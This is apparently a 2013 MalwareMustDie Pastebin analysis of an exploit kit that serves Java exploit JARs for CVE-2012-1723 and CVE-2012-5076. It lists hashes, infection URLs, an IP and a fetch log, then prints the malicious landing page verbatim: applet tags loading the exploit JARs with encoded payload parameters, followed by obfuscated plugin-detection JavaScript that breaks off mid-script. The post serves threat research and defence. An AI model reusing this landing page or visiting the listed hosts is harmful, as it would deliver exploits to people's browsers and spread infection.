SHARE
TWEET

#MMD - JAR CVE-2012-1723 + CVE-2012-5076 JAR Analysis #Guide

MalwareMustDie Jan 8th, 2013 396 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ================================================================================
  2. #MalwareMustDie - Tue Jan  8 21:36:28 JST 2013
  3. Unknown Exploit Kit dropping 2 jars for the payload (in the applet parts)
  4. used the modified plugindetect script, w/o payload leads.
  5. This is an analysis GUIDE of of Jar CVE-2012-1723 + CVE-2012-5076
  6. (sorry, got not enough time.. can't check the payload yet.
  7. pls continue or follow from this lead)
  8. ================================================================================
  9. first jar: jimmdemy.jar
  10. MD5:    be2bcd6c3f2aee6432358e1fb37a8dc2
  11. File size:      9.2 KB ( 9465 bytes )
  12. File name:      jimmdemy.jar
  13. File type:      JAR
  14. Tags:   exploit jar cve-2012-1723
  15. Detection ratio:        7 / 45  <========== IMPORTANT!!!
  16. Analysis date:  2013-01-08 10:40:02 UTC ( 25 分 ago )
  17. https://www.virustotal.com/file/2eb97401ca9954d4cf2ca5ad881598e9ea8981d6b89bd017e7b21bc0e153b70b/analysis/
  18. ================================================================================
  19. second jar: torylane.jar
  20. MD5:    ae66fc69244abec22f20384356806ad2
  21. File size:      5.4 KB ( 5502 bytes )
  22. File name:      torylane.jar
  23. File type:      JAR
  24. Tags:   jar
  25. Detection ratio:        1 / 46  <======== LOW DETECTION!!
  26. Analysis date:  2013-01-08 12:50:22 UTC ( 39 分 ago )
  27. https://www.virustotal.com/file/92ad670f3d32c91afffc60c54e9c5d19095d827ec86d2d89ebfa0a7856fa93e8/analysis/
  28. ================================================================================
  29.  
  30. //=====================
  31. //Source of infection
  32. //=====================
  33. -------------------------------------------------------------------------
  34. URL                                                             IP
  35. -------------------------------------------------------------------------
  36. afgarcia67.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070         217.23.6.57
  37. davidsonfrc89.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070      217.23.6.57
  38. -------------------------------------------------------------------------
  39.  
  40. // Checked, it was the same coded landing page, so I focus to one:
  41. URL: davidsonfrc89.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070
  42.  
  43. // a fetch log... (PS: can't downloads too many times w/ same params..)
  44.  
  45. --18:17:07--  h00p://davidsonfrc89.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070
  46.            => `lavaafly.php@janeoleg=875070'
  47. Resolving davidsonfrc89.net... seconds 0.00, 217.23.6.57
  48. Caching davidsonfrc89.net => 217.23.6.57
  49. Connecting to davidsonfrc89.net|217.23.6.57|:80... seconds 0.00, connected.
  50.   :
  51. GET /Jdowu32ds2s/lavaafly.php?janeoleg=875070 HTTP/1.0
  52.  
  53. User-Agent: #MalwareMustDie Playing with your jars
  54. Accept: */*
  55. Host: davidsonfrc89.net
  56. Connection: Keep-Alive
  57.   :
  58. HTTP request sent, awaiting response...
  59.   :
  60. HTTP/1.1 200 OK
  61. Server: nginx/1.2.6
  62. Date: Tue, 08 Jan 2013 07:30:34 GMT
  63. Content-Type: text/html; charset=UTF-8
  64. Transfer-Encoding: chunked
  65. Connection: keep-alive
  66.  :
  67. 200 OK
  68. Registered socket 3 for persistent reuse.
  69. URI content encoding = `UTF-8'
  70. Length: unspecified [text/html]
  71. Saving to: `lavaafly.php?janeoleg=875070'
  72. 2013-01-08 16:30:35 (33.6 KB/s) - `lavaafly.php?janeoleg=875070' saved [29766]
  73.  
  74. // It's an obfusctation of HTML with plugindetect script:
  75.  
  76. ================================================================================
  77.  
  78. //=====================
  79. //Landing page
  80. // *) the payload urls looks only is in the applet parts...
  81. //=====================
  82. <applet code="ors.class" archive="rgerding/jimmdemy.jar" width="1" height="1"><param name="bhjwfffiorjwe" value="0jfX19NXhX1MMX0ZltNjk9k/agtjNgs9hgZpBVthZX8.:jfg2.8/N/sljhaf0f/2lMBM9atrZag3Bd38oXfVNsB.fs0jC1BhtgeMZ/8j.30tajCCNNZtt9sX/0Ndga98shkk0CsCVN3VgB0gVkfs09kZi30MBdV..aNsfVftf3nV99fkgt2tBf/jas1.o2sXt2XtfnVh./hj8.itVfkaftCoC/30aCV399d/B1/3M.j8gBljBsn33h/khB9efZZglsj3thkNasMNg/j8.glXXtJZ8.CdXMNdt33ststhohXMZ/38dw92B8gl32u.8Zkg30g39BX21Xkl2lCXaXMjfdj8kC/aZ/s33sf280C2ZdMk9Cj3sd2/1jdaN/adltfB/kjNlNf/k3gaMhBk/8aknVt3/d.MjukXjZldVCdfs/dh2C1ekk3st.f0n.dCdkaZgtB120/Nhj.CjZ.al0jpjCgjC0.Ch3B2lCjZdp"></applet><applet code="gee.class" archive="rgerding/torylane.jar" width="1" height="1"><param name="bhjiorjwe" value=".f//9jkMhNVgB1l2tt0djf3j32t21/Z.M0.p1C3X3a/g:1h.ZM2Zs/t1Z/.g92/l0flsta8rV/gXth/1oV3dl0Vj1sM1VMlZjdesXffXhsdtfN1h2VlNtBfCf.8tgaB020sa3fsBkBsX0g8gdlka9jXhiBkVXtV/Cah1fZ9d1gnghX/t39jtt.f2d2k9o.2htZjV2nt/j2ktdXih1NgVfC0oj/NZ90j19NB9.8M98.gaVXa8lMnCC2f3ZtsegXCsd331tZ00hlZdN/N8aB1ktgJ980Vf09Vdjg2Zj0k1og3lNhft8wkaZ/dZf.uftCC0Mf/32lMl9C8k2N/V8dV0Md1kh/CC//sCBBh.8f22/131h132s0BV/dgh//XV3kj2s3jg0jgBXkNajljC8sMXn0lZ/N93tuM9d0CgCtdl8gVMBk0eVMfNB1tjn8Ndhflg0t3CMX.aXa.//0hN3akpfhV8l0s/hkgjNZVkgp"></applet><html><body></body><script type="text/javascript">var actojack={version:"ruptable",name:"actojack",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumRegx).exec(b):null;return a?a[0]:null},compareNums:function(h,f,d){var e=this,c,b,a,g=parseInt;if(e.isStrNum(h)&&e.isStrNum(f)){if(e.isDefined(d)&&d.compareNums){return d.compareNums(h,f)}c=h.split(e.splitNumRegx);b=f.split(e.splitNumRegx);for(a=0;a<Math.min(c.length,b.length);a++){if(g(c[a],10)>g(b[a],10)){return 1}if(g(c[a],10)<g(b[a],10)){return -1}}}return 0},formatNum:function(b,c){var d=this,a,e;if(!d.isStrNum(b)){return null}if(!d.isNum(c)){c=4}c--;e=b.replace(/\s/g,"").split(d.splitNumRegx).concat(["0","0","0","0"]);for(a=0;a<4;a++){if(/^(0+)(.+)$/.test(e[a])){e[a]=RegExp.$2}if(a>c||!(/\d/).test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},$$hasMimeType:function(a){return function(c){if(!a.isIE&&c){var f,e,b,d=a.isArray(c)?c:(a.isString(c)?[c]:[]);for(b=0;b<d.length;b++){if(a.isString(d[b])&&/[^\s]/.test(d[b])){f=navigator.mimeTypes[d[b]];e=f?f.enabledPlugin:0;if(e&&(e.name||e.description)){return f}}}}return null}},findNavPlugin:function(l,e,c){var j=this,h=new RegExp(l,"i"),d=(!j.isDefined(e)||e)?/\d/:0,k=c?new RegExp(c,"i"):0,a=navigator.plugins,g="",f,b,m;for(f=0;f<a.length;f++){m=a[f].description||g;b=a[f].name||g;if((h.test(m)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))||(h.test(b)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))){if(!k||!(k.test(m)||k.test(b))){return a[f]}}}return null},getMimeEnabledPlugin:function(k,m,c){var e=this,f,b=new RegExp(m,"i"),h="",g=c?new RegExp(c,"i"):0,a,l,d,j=e.isString(k)?[k]:k;for(d=0;d<j.length;d++){if((f=e.hasMimeType(j[d]))&&(f=f.enabledPlugin)){l=f.description||h;a=f.name||h;if(b.test(l)||b.test(a)){if(!g||!(g.test(l)||g.test(a))){return f}}}}return 0},getPluginFileVersion:function(f,b){var h=this,e,d,g,a,c=-1;if(h.OS>2||!f||!f.version||!(e=h.getNum(f.version))){return b}if(!b){return e}e=h.formatNum(e);b=h.formatNum(b);d=b.split(h.splitNumRegx);g=e.split(h.splitNumRegx);for(a=0;a<d.length;a++){if(c>-1&&a>c&&d[a]!="0"){return b}if(g[a]!=d[a]){if(c==-1){c=a}if(d[a]!="0"){return b}}}return e},AXO:window.ActiveXObject,getAXO:function(a){var f=null,d,b=this,c={};try{f=new b.AXO(a)}catch(d){}return f},convertFuncs:function(f){var a,g,d,b=/^[\$][\$]/,c=this;for(a in f){if(b.test(a)){try{wx=2;g=a.slice(wx);if(g.length>0&&!f[g]){f[g]=f[a](f);delete f[a]}}catch(d){}}}},initObj:function(e,b,d){var a,c;if(e){if(e[b[0]]==1||d){for(a=0;a<b.length;a=a+2){e[b[a]]=b[a+1]}}for(a in e){c=e[a];if(c&&c[b[0]]==1){this.initObj(c,b)}}}},initScript:function(){var c=this,a=navigator,e="/",f,i=a.userAgent||"",g=a.vendor||"",b=a.platform||"",h=a.product||"";c.initObj(c,["$",c]);for(f in c.Plugins){if(c.Plugins[f]){c.initObj(c.Plugins[f],["$",c,"$$",c.Plugins[f]],1)}};c.OS=100;if(b){var d=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod",21.2,"iPad",21.3,"Win.*CE",22.1,"Win.*Mobile",22.2,"Pocket\s*PC",22.3,"",100];for(f=d.length-2;f>=0;f=f-2){if(d[f]&&new RegExp(d[f],"i").test(b)){c.OS=d[f+1];break}}}c.convertFuncs(c);c.head=(document.getElementsByTagName("head")[0]||document.getElementsByTagName("body")[0]||document.body||null);c.isIE=(new Function("return "+e+"*@cc_on!@*"+e+"false"))();c.verIE=c.isIE&&(/MSIE\s*(\d+\.?\d*)/i).test(i)?parseFloat(RegExp.$1,10):null;c.ActiveXEnabled=false;if(c.isIE){var f,j=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM","ShockwaveFlash.ShockwaveFlash","TDCCtl.TDCCtl","Shell.UIHelper","Scripting.Dictionary","wmplayer.ocx"];for(f=0;f<j.length;f++){if(c.getAXO(j[f])){c.ActiveXEnabled=true;break}}}c.isGecko=(/Gecko/i).test(h)&&(/Gecko\s*\/\s*\d/i).test(i);c.verGecko=c.isGecko?c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i)?RegExp.$1:"0.9"):null;c.isChrome=(/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);c.verChrome=c.isChrome?c.formatNum(RegExp.$1):null;c.isSafari=((/Apple/i).test(g)||(!g&&!c.isChrome))&&(/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);c.verSafari=c.isSafari&&(/Version\s*\/\s*(\d[\d\.]*)/i).test(i)?c.formatNum(RegExp.$1):null;c.isOpera=(/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);c.verOpera=c.isOpera&&((/Version\s*\/\s*(\d+\.?\d*)/i).test(i)||1)?parseFloat(RegExp.$1,10):null;c.addWinEvent("load",c.handler(c.runWLfuncs,c))},init:function(d){var c=this,b,d,a={status:-3,plugin:0};if(!c.isString(d)){return a}if(d.length==1){c.getVersionDelimiter=d;return a}d=d.toLowerCase().replace(/\s/g,"");b=c.Plugins[d];if(!b||!b.getVersion){return a}a.plugin=b;if(!c.isDefined(b.installed)){b.installed=null;b.version=null;b.version0=null;b.getVersionDone=null;b.pluginName=d}c.garbage=false;if(c.isIE&&!c.ActiveXEnabled&&d!=="java"){a.status=-2;return a}a.status=1;return a},fPush:function(b,a){var c=this;if(c.isArray(a)&&(c.isFunc(b)||(c.isArray(b)&&b.length>0&&c.isFunc(b[0])))){a.push(b)}},callArray:function(b){var c=this,a;if(c.isArray(b)){for(a=0;a<b.length;a++){if(b[a]===null){return}c.call(b[a]);b[a]=null}}},call:function(c){var b=this,a=b.isArray(c)?c.length:-1;if(a>0&&b.isFunc(c[0])){c[0](b,a>1?c[1]:0,a>2?c[2]:0,a>3?c[3]:0)}else{if(b.isFunc(c)){c(b)}}},$$isMinVersion:function(a){return function(h,g,d,c){var e=a.init(h),f,b=-1,j={};if(e.status<0){return e.status}f=e.plugin;g=a.formatNum(a.isNum(g)?g.toString():(a.isStrNum(g)?a.getNum(g):"0"));if(f.getVersionDone!=1){f.getVersion(g,d,c);if(f.getVersionDone===null){f.getVersionDone=1}}a.cleanup();if(f.installed!==null){b=f.installed<=0.5?f.installed:(f.installed==0.7?1:(f.version===null?0:(a.compareNums(f.version,g,f)>=0?1:-0.1)))};return b}},getVersionDelimiter:",",$$getVersion:function(a){return function(g,d,c){var e=a.init(g),f,b,h={};if(e.status<0){return null};f=e.plugin;if(f.getVersionDone!=1){f.getVersion(null,d,c);if(f.getVersionDone===null){f.getVersionDone=1}}a.cleanup();b=(f.version||f.version0);b=b?b.replace(a.splitNumRegx,a.getVersionDelimiter):b;return b}},cleanup:function(){var a=this;if(a.garbage&&a.isDefined(window.CollectGarbage)){window.CollectGarbage()}},addWinEvent:function(d,c){var e=this,a=window,b;if(e.isFunc(c)){if(a.addEventListener){a.addEventListener(d,c,false)}else{if(a.attachEvent){a.attachEvent("on"+d,c)}else{b=a["on"+d];a["on"+d]=e.winHandler(c,b)}}}},winHandler:function(d,c){return function(){d();if(typeof c=="function"){c()}}},WLfuncs0:[],WLfuncs:[],runWLfuncs:function(a){var b={};a.winLoaded=true;a.callArray(a.WLfuncs0);a.callArray(a.WLfuncs);if(a.onDoneEmptyDiv){a.onDoneEmptyDiv()}},winLoaded:false,$$onWindowLoaded:function(a){return function(b){if(a.winLoaded){a.call(b)}else{a.fPush(b,a.WLfuncs)}}},$$onDetectionDone:function(a){return function(h,g,c,b){var d=a.init(h),k,e,j={};if(d.status==-3){return -1}e=d.plugin;if(!a.isArray(e.funcs)){e.funcs=[]}if(e.getVersionDone!=1){k=a.isMinVersion?a.isMinVersion(h,"0",c,b):a.getVersion(h,c,b)}if(e.installed!=-0.5&&e.installed!=0.5){a.call(g);return 1}if(e.NOTF){a.fPush(g,e.funcs);return 0}return 1}},div:null,divID:"actojack",divWidth:50,pluginSize:1,emptyDiv:function(){var d=this,b,h,c,a,f,g;if(d.div&&d.div.childNodes){for(b=d.div.childNodes.length-1;b>=0;b--){c=d.div.childNodes[b];if(c&&c.childNodes){for(h=c.childNodes.length-1;h>=0;h--){g=c.childNodes[h];try{c.removeChild(g)}catch(f){}}}if(c){try{d.div.removeChild(c)}catch(f){}}}}if(!d.div){a=document.getElementById(d.divID);if(a){d.div=a}}if(d.div&&d.div.parentNode){try{d.div.parentNode.removeChild(d.div)}catch(f){}d.div=null}},DONEfuncs:[],onDoneEmptyDiv:function(){var c=this,a,b;if(!c.winLoaded){return}if(c.WLfuncs&&c.WLfuncs.length&&c.WLfuncs[c.WLfuncs.length-1]!==null){return}for(a in c){b=c[a];if(b&&b.funcs){if(b.OTF==3){return}if(b.funcs.length&&b.funcs[b.funcs.length-1]!==null){return}}}for(a=0;a<c.DONEfuncs.length;a++){c.callArray(c.DONEfuncs)}c.emptyDiv()},getWidth:function(c){if(c){var a=c.scrollWidth||c.offsetWidth,b=this;if(b.isNum(a)){return a}}return -1},getTagStatus:function(m,g,a,b){var c=this,f,k=m.span,l=c.getWidth(k),h=a.span,j=c.getWidth(h),d=g.span,i=c.getWidth(d);if(!k||!h||!d||!c.getDOMobj(m)){return -2}if(j<i||l<0||j<0||i<0||i<=c.pluginSize||c.pluginSize<1){return 0}if(l>=i){return -1}try{if(l==c.pluginSize&&(!c.isIE||c.getDOMobj(m).readyState==4)){if(!m.winLoaded&&c.winLoaded){return 1}if(m.winLoaded&&c.isNum(b)){if(!c.isNum(m.count)){m.count=b}if(b-m.count>=10){return 1}}}}catch(f){}return 0},getDOMobj:function(g,a){var f,d=this,c=g?g.span:0,b=c&&c.firstChild?1:0;try{if(b&&a){d.div.focus()}}catch(f){}return b?c.firstChild:null},setStyle:function(b,g){var f=b.style,a,d,c=this;if(f&&g){for(a=0;a<g.length;a=a+2){try{f[g[a]]=g[a+1]}catch(d){}}}},insertDivInBody:function(a,i){var h,f=this,b="pd33993399",d=null,j=i?window.top.document:window.document,c="<",g=(j.getElementsByTagName("body")[0]||j.body);if(!g){try{j.write(c+'div id="'+b+'">o'+c+"/div>");d=j.getElementById(b)}catch(h){}}g=(j.getElementsByTagName("body")[0]||j.body);if(g){if(g.firstChild&&f.isDefined(g.insertBefore)){g.insertBefore(a,g.firstChild)}else{g.appendChild(a)}if(d){g.removeChild(d)}}else{}},insertHTML:function(g,b,h,a,l){var m,n=document,k=this,q,p=n.createElement("span"),o,j,f="<";var c=["outlineStyle","none","borderStyle","none","padding","0px","margin","0px","visibility","visible"];var i="outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";if(!k.isDefined(a)){a=""}if(k.isString(g)&&(/[^\s]/).test(g)){g=g.toLowerCase().replace(/\s/g,"");q=f+g+' width="'+k.pluginSize+'" height="'+k.pluginSize+'" ';q+='style="'+i+'display:inline;" ';for(o=0;o<b.length;o=o+2){if(/[^\s]/.test(b[o+1])){q+=b[o]+'="'+b[o+1]+'" '}}q+=">";for(o=0;o<h.length;o=o+2){if(/[^\s]/.test(h[o+1])){q+=f+'param name="'+h[o]+'" value="'+h[o+1]+'" />'}}q+=a+f+"/"+g+">"}else{q=a}if(!k.div){j=n.getElementById(k.divID);if(j){k.div=j}else{k.div=n.createElement("div");k.div.id=k.divID}k.setStyle(k.div,c.concat(["width",k.divWidth+"px","height",(k.pluginSize+3)+"px","fontSize",(k.pluginSize+3)+"px","lineHeight",(k.pluginSize+3)+"px","verticalAlign","baseline","display","block"]));if(!j){k.setStyle(k.div,["position","absolute","right","0px","top","0px"]);k.insertDivInBody(k.div)}}if(k.div&&k.div.parentNode){k.setStyle(p,c.concat(["fontSize",(k.pluginSize+3)+"px","lineHeight",(k.pluginSize+3)+"px","verticalAlign","baseline","display","inline"]));try{p.innerHTML=q}catch(m){};try{k.div.appendChild(p)}catch(m){};return{span:p,winLoaded:k.winLoaded,tagName:g,outerHTML:q}}return{span:null,winLoaded:k.winLoaded,tagName:"",outerHTML:q}},file:{$:1,any:"fileStorageAny999",valid:"fileStorageValid999",save:function(d,f,c){var b=this,e=b.$,a;if(d&&e.isDefined(c)){if(!d[b.any]){d[b.any]=[]}if(!d[b.valid]){d[b.valid]=[]}d[b.any].push(c);a=b.split(f,c);if(a){d[b.valid].push(a)}}},getValidLength:function(a){return a&&a[this.valid]?a[this.valid].length:0},getAnyLength:function(a){return a&&a[this.any]?a[this.any].length:0},getValid:function(c,a){var b=this;return c&&c[b.valid]?b.get(c[b.valid],a):null},getAny:function(c,a){var b=this;return c&&c[b.any]?b.get(c[b.any],a):null},get:function(d,a){var c=d.length-1,b=this.$.isNum(a)?a:c;return(b<0||b>c)?null:d[b]},split:function(g,c){var b=this,e=b.$,f=null,a,d;g=g?g.replace(".","\."):"";d=new RegExp("^(.*[^\/])("+g+"\s*)$");if(e.isString(c)&&d.test(c)){a=(RegExp.$1).split("/");f={name:a[a.length-1],ext:RegExp.$2,full:c};a[a.length-1]="";f.path=a.join("/")}return f},z:0},Plugins:{java:{mimeType:["application/x-java-applet","application/x-java-vm","application/x-java-bean"],classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",navigator:{a:window.navigator.javaEnabled(),javaEnabled:function(){return this.a},mimeObj:0,pluginObj:0},OTF:null,minIEver:7,debug:0,debugEnable:function(){var a=this,b=a.$;a.debug=1},isDisabled:{$:1,DTK:function(){var a=this,c=a.$,b=a.$$;if((c.isGecko&&c.compareNums(c.verGecko,c.formatNum("1.6"))<=0)||(c.isSafari&&c.OS==1&&(!c.verSafari||c.compareNums(c.verSafari,"5,1,0,0")<0))||c.isChrome||(c.isIE&&!c.ActiveXEnabled)){return 1}return 0},AXO:function(){var a=this,c=a.$,b=a.$$;return(!c.isIE||!c.ActiveXEnabled||(!b.debug&&b.DTK.query().status!==0))},navMime:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;if(d.isIE||!a.mimeObj||!a.pluginObj){return 1}return 0},navPlugin:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;if(d.isIE||!a.mimeObj||!a.pluginObj){return 1}return 0},windowDotJava:function(){var a=this,c=a.$,b=a.$$;if(!window.java){return 1}if(c.OS==2&&c.verOpera&&c.verOpera<9.2&&c.verOpera>=9){return 1}if(c.verGecko&&c.compareNums(c.verGecko,"1,9,0,0")<0&&c.compareNums(c.verGecko,"1,8,0,0")>=0){return 1}return 0},allApplets:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;if(d.OS>=20){return 0}if(d.verOpera&&d.verOpera<11&&!a.javaEnabled()&&!c.lang.System.getProperty()[0]){return 1}if((d.verGecko&&d.compareNums(d.verGecko,d.formatNum("2"))<0)&&!a.mimeObj&&!c.lang.System.getProperty()[0]){return 1}return 0},AppletTag:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;return d.isIE?!a.javaEnabled():0},ObjectTag:function(){var a=this,c=a.$,b=a.$$;return c.isIE?!c.ActiveXEnabled:0},z:0},getVerifyTagsDefault:function(){var a=this,c=a.$,b=[1,0,1];if(c.OS>=20){return b}if((c.isIE&&(c.verIE<9||!c.ActiveXEnabled))||(c.verGecko&&c.compareNums(c.verGecko,c.formatNum("2"))<0)||(c.isSafari&&(!c.verSafari||c.compareNums(c.verSafari,c.formatNum("4"))<0))||(c.verOpera&&c.verOpera<10)){b=[1,1,1]}return b},getVersion:function(j,g,i){var b=this,d=b.$,e,a=b.applet,h=b.verify,k=b.navigator,f=null,l=null,c=null;if(b.getVersionDone===null){b.OTF=0;k.mimeObj=d.hasMimeType(b.mimeType);if(k.mimeObj){k.pluginObj=k.mimeObj.enabledPlugin}if(h){h.begin()}}a.setVerifyTagsArray(i);d.file.save(b,".jar",g);if(b.getVersionDone===0){if(a.should_Insert_Query_Any()){e=a.insert_Query_Any();b.setPluginStatus(e[0],e[1],f)}return}if((!f||b.debug)&&b.DTK.query().version){f=b.DTK.version}if((!f||b.debug)&&b.navMime.query().version){f=b.navMime.version}if((!f||b.debug)&&b.navPlugin.query().version){f=b.navPlugin.version}if((!f||b.debug)&&b.AXO.query().version){f=b.AXO.version}if(b.nonAppletDetectionOk(f)){c=f}if(!c||b.debug||a.VerifyTagsHas(2.2)||a.VerifyTagsHas(2.5)){e=b.lang.System.getProperty();if(e[0]){f=e[0];c=e[0];l=e[1]}}b.setPluginStatus(c,l,f);if(a.should_Insert_Query_Any()){e=a.insert_Query_Any();if(e[0]){c=e[0];l=e[1]}}b.setPluginStatus(c,l,f)},nonAppletDetectionOk:function(b){var d=this,e=d.$,a=d.navigator,c=1;if(!b||(!a.javaEnabled()&&!d.lang.System.getPropertyHas(b))||(!e.isIE&&!a.mimeObj&&!d.lang.System.getPropertyHas(b))||(e.isIE&&!e.ActiveXEnabled)){c=0}else{if(e.OS>=20){}else{if(d.info&&d.info.getPlugin2Status()<0&&d.info.BrowserRequiresPlugin2()){c=0}}}return c},setPluginStatus:function(d,f,a){var c=this,e=c.$,b;a=a||c.version0;if(c.OTF>0){d=d||c.lang.System.getProperty()[0]}if(c.OTF<3){b=d?1:(a?-0.2:-1);if(c.installed===null||b>c.installed){c.installed=b}}if(c.OTF==2&&c.NOTF&&!c.applet.getResult()[0]&&!c.lang.System.getProperty()[0]){c.installed=a?-0.2:-1};if(c.OTF==3&&c.installed!=-0.5&&c.installed!=0.5){c.installed=(c.NOTF.isJavaActive(1)==1||c.lang.System.getProperty()[0])?0.5:-0.5}if(c.OTF==4&&(c.installed==-0.5||c.installed==0.5)){if(d){c.installed=1}else{if(c.NOTF.isJavaActive(1)==1){if(a){c.installed=1;d=a}else{c.installed=0}}else{if(a){c.installed=-0.2}else{c.installed=-1}}}};if(a){c.version0=e.formatNum(e.getNum(a))}if(d){c.version=e.formatNum(e.getNum(d))}if(f&&e.isString(f)){c.vendor=f}if(!c.vendor){c.vendor=""}if(c.verify&&c.verify.isEnabled()){c.getVersionDone=0}else{if(c.getVersionDone!=1){if(c.OTF<2){c.getVersionDone=0}else{c.getVersionDone=c.applet.can_Insert_Query_Any()?0:1}}}},DTK:{$:1,hasRun:0,status:null,VERSIONS:[],version:"",HTML:null,Plugin2Status:null,classID:["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA","clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],mimeType:["application/java-deployment-toolkit","application/npruntime-scriptable-plugin;DeploymentToolkit"],disabled:function(){return this.$$.isDisabled.DTK()},query:function(){var k=this,g=k.$,d=k.$$,j,l,h,m={},f={},a,c=null,i=null,b=(k.hasRun||k.disabled());k.hasRun=1;if(b){return k}k.status=0;if(g.isIE&&g.verIE>=6){for(l=0;l<k.classID.length;l++){k.HTML=g.insertHTML("object",["classid",k.classID[l]],[]);c=g.getDOMobj(k.HTML);try{if(c&&c.jvms){break}}catch(j){}}}else{if(!g.isIE&&(h=g.hasMimeType(k.mimeType))&&h.type){k.HTML=g.insertHTML("object",["type",h.type],[]);c=g.getDOMobj(k.HTML)}}if(c){try{a=c.jvms;if(a){i=a.getLength();if(g.isNum(i)){k.status=i>0?1:-1;for(l=0;l<i;l++){h=g.getNum(a.get(i-1-l).version);if(h){k.VERSIONS.push(h);f["a"+g.formatNum(h)]=1}}}}}catch(j){}}h=0;for(l in f){h++}if(h&&h!==k.VERSIONS.length){k.VERSIONS=[]}if(k.VERSIONS.length){k.version=g.formatNum(k.VERSIONS[0])};return k}},AXO:{$:1,hasRun:0,VERSIONS:[],version:"",disabled:function(){return this.$$.isDisabled.AXO()},JavaVersions:[[1,9,1,40],[1,8,1,40],[1,7,1,40],[1,6,0,40],[1,5,0,30],[1,4,2,30],[1,3,1,30]],query:function(){var a=this,e=a.$,b=a.$$,c=(a.hasRun||a.disabled());a.hasRun=1;if(c){return a}var i=[],k=[1,5,0,14],j=[1,6,0,2],h=[1,3,1,0],g=[1,4,2,0],f=[1,5,0,7],d=b.getInfo?true:false,l={};if(e.verIE>=b.minIEver){i=a.search(j,j,d);if(i.length>0&&d){i=a.search(k,k,d)}}else{if(d){i=a.search(f,f,true)}if(i.length==0){i=a.search(h,g,false)}}if(i.length){a.version=i[0];a.VERSIONS=[].concat(i)};return a},search:function(a,j,p){var h,d,f=this,e=f.$,k=f.$$,n,c,l,q,b,o,r,i=[];if(e.compareNums(a.join(","),j.join(","))>0){j=a}j=e.formatNum(j.join(","));var m,s="1,4,2,0",g="JavaPlugin."+a[0]+""+a[1]+""+a[2]+""+(a[3]>0?("_"+(a[3]<10?"0":"")+a[3]):"");for(h=0;h<f.JavaVersions.length;h++){d=f.JavaVersions[h];n="JavaPlugin."+d[0]+""+d[1];b=d[0]+"."+d[1]+".";for(l=d[2];l>=0;l--){r="JavaWebStart.isInstalled."+b+l+".0";if(e.compareNums(d[0]+","+d[1]+","+l+",0",j)>=0&&!e.getAXO(r)){continue}m=e.compareNums(d[0]+","+d[1]+","+l+",0",s)<0?true:false;for(q=d[3];q>=0;q--){c=l+"_"+(q<10?"0"+q:q);o=n+c;if(e.getAXO(o)&&(m||e.getAXO(r))){i.push(b+c);if(!p){return i}}if(o==g){return i}}if(e.getAXO(n+l)&&(m||e.getAXO(r))){i.push(b+l);if(!p){return i}}if(n+l==g){return i}}}return i}},navMime:{$:1,hasRun:0,mimetype:"",version:"",length:0,mimeObj:0,pluginObj:0,disabled:function(){return this.$$.isDisabled.navMime()},query:function(){var i=this,f=i.$,a=i.$$,b=(i.hasRun||i.disabled());i.hasRun=1;if(b){return i};var n=/^\s*application\/x-java-applet;jpi-version\s*=\s*(\d.*)$/i,g,l,j,d="",h="a",o,m,k={},c=f.formatNum("0");for(l=0;l<navigator.mimeTypes.length;l++){o=navigator.mimeTypes[l];m=o?o.enabledPlugin:0;g=o&&n.test(o.type||d)?f.formatNum(f.getNum(RegExp.$1)):0;if(g&&m&&(m.description||m.name)){if(!k[h+g]){i.length++}k[h+g]=o.type;if(f.compareNums(g,c)>0){c=g}}}g=k[h+c];if(g){o=f.hasMimeType(g);i.mimeObj=o;i.pluginObj=o?o.enabledPlugin:0;i.mimetype=g;i.version=c};return i}},navPlugin:{$:1,hasRun:0,version:"",disabled:function(){return this.$$.isDisabled.navPlugin()},query:function(){var m=this,e=m.$,c=m.$$,h=c.navigator,j,l,k,g,d,a,i,f=0,b=(m.hasRun||m.disabled());m.hasRun=1;if(b){return m};a=h.pluginObj.name||"";i=h.pluginObj.description||"";document.write('if(!f||c.debug){g=/Java[^\d]*Plug-in/i;l=g.test(i)?e.for'+'matNum(e.getNum(i)):0;k=g.test(a)?e.formatNum(e.getNum(a)):0;if(l&&(e.compareNums(l,e.formatNum("1,3"))<0||e.compareNums(l,e.formatNum("2"))>=0)){l=0}if(k&&(e.compareNums(k,e.formatNum("1,3"))<0||e.compareNums(k,e.formatNum("2"))>=0)){k=0}d=l&&k?(e.compareNums(l,k)>0?l:k):(l||k);if(d){f=d}}');if(!f&&e.isSafari&&e.OS==2){j=e.findNavPlugin("Java.*\d.*Plug-in.*Cocoa",0);if(j){l=e.getNum(j.description);if(l){f=l}}};if(f){m.version=e.formatNum(f)};return m}},lang:{$:1,System:{$:1,hasRun:0,result:[null,null],disabled:function(){return this.$$.isDisabled.windowDotJava()},getPropertyHas:function(a){var 